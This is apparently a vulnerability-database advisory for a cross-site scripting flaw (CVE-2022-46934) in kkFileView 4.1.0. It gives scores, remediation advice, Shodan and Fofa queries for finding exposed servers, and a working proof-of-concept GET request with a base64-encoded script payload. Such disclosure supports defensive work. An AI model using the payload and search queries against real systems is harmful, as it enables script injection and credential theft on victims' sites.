| Title | kkFileView 4.1.0 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. |
| CVSS Score | 6.1 |
| EPSS Score | 0.12872 |
| CVE ID | CVE-2022-46934 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"kkFileView"http.html:"kkfileview" |
| Fofa Query | body="kkfileview"app="kkfileview" |
| Tags | cve cve2022 xss kkfileview keking vuln |
kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46934.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-46934.pcap
N/AN/A